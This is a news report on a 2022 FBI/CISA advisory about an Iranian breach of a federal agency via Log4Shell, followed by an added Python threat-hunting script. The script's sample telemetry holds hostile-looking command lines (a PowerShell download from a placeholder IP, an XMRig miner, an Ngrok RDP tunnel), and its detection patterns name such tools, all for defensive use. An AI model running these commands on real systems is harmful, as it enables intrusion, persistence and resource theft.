Iranian nation-state threat actors breached a Federal agency’s network and then deployed malware, including a credential harvester and a cryptocurrency miner, according to a joint advisory released on Nov. 16 by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA).
According to the advisory, CISA conducted an incident response engagement from mid-June through mid-July 2022 at a Federal Civilian Executive Branch organization where it observed suspicious activity. CISA and the FBI assessed the Federal agency’s network was compromised by Iranian nation-state threat actors.
During a Senate Homeland Security and Governmental Affairs Committee hearing on Nov. 17, Secretary of Homeland Security Alejandro Mayorkas said he believes the breach is being classified as “a major incident.”
CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server. After the threat actors gained access, they “installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence in the network.”
Once inside the network, the threat actors used Remote Desktop Protocol (RDP) and a built-in default Windows user account to move across the agency’s systems. They also used a PowerShell command to download software without triggering the antivirus scanner.
CISA and FBI believe the threat actors compromised the network as early as February 2022, and incident response was conducted after Einstein – a Federal civilian agency-wide intrusion detection system operated by CISA – detected signs of the threat activity in April.
All organizations with affected VMware systems that did not immediately apply available patches or workarounds should assume their networks have been compromised and initiate threat hunting activities, CISA and FBI noted in the advisory.
“If suspected initial access or compromise is detected … CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems, and audit privileged accounts,” the advisory stated.
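The behaviours reported above (RDP logons with a built-in account, XMRig, Ngrok and PowerShell downloads) can be hunted for in host telemetry along the lines the advisory recommends. The following is an added example, not code from CISA, the FBI or the advisory; the event schema, the detection patterns and the sample records are all constructed for illustration.

```python
"""Hunting helper for the behaviours the advisory summary names: RDP logons with
a built-in account, XMRig, Ngrok and PowerShell download cradles. Added example,
not CISA/FBI code; event schema, patterns and sample records are constructed."""
import re
from typing import Dict, Iterable, List

# Assumed patterns for what such tooling usually looks like in process telemetry;
# they are not indicators taken from the advisory.
MINER_RE = re.compile(r"xmrig", re.I)
TUNNEL_RE = re.compile(r"\bngrok(\.exe)?\b", re.I)
PS_DOWNLOAD_RE = re.compile(
    r"powershell.*(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer)",
    re.I | re.S)
BUILTIN_ACCOUNTS = {"administrator", "guest", "defaultaccount"}

def hunt(events: Iterable[Dict]) -> List[Dict]:
    """Return one finding (host, rule, evidence) per suspicious event."""
    findings = []
    for ev in events:
        host = ev.get("host", "?")
        if ev.get("type") == "logon":
            # Logon type 10 is RemoteInteractive (RDP) in Windows Security logs.
            if ev.get("logon_type") == 10 and ev.get("user", "").lower() in BUILTIN_ACCOUNTS:
                findings.append({"host": host, "rule": "rdp_builtin_account", "evidence": ev["user"]})
        elif ev.get("type") == "process":
            cmd = ev.get("cmdline", "")
            for rule, pattern in (("crypto_miner", MINER_RE), ("reverse_proxy", TUNNEL_RE),
                                  ("powershell_download", PS_DOWNLOAD_RE)):
                if pattern.search(cmd):
                    findings.append({"host": host, "rule": rule, "evidence": cmd})
    return findings

def hosts_with_chain(findings: List[Dict], minimum: int = 2) -> List[str]:
    """Hosts where several distinct behaviours stack up; triage these first."""
    by_host: Dict[str, set] = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in by_host.items() if len(rules) >= minimum)

# Constructed sample telemetry; hostnames, paths and addresses are placeholders.
SAMPLE_EVENTS = [
    {"type": "logon", "host": "HORIZON01", "user": "Administrator", "logon_type": 10},
    {"type": "logon", "host": "WS07", "user": "jdoe", "logon_type": 10},
    {"type": "process", "host": "HORIZON01", "cmdline":
     "powershell.exe -c Invoke-WebRequest http://198.51.100.7/a.zip -OutFile C:\\Users\\Public\\a.zip"},
    {"type": "process", "host": "HORIZON01", "cmdline": "C:\\Users\\Public\\xmrig.exe -o pool.example:3333"},
    {"type": "process", "host": "DC01", "cmdline": "C:\\Users\\Public\\ngrok.exe tcp 3389"},
    {"type": "process", "host": "WS07", "cmdline": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]
```

Running `hunt(SAMPLE_EVENTS)` yields four findings, and `hosts_with_chain` singles out the host where the download, miner and built-in-account RDP logon all stack up, which is where the "assume lateral movement" guidance says to start.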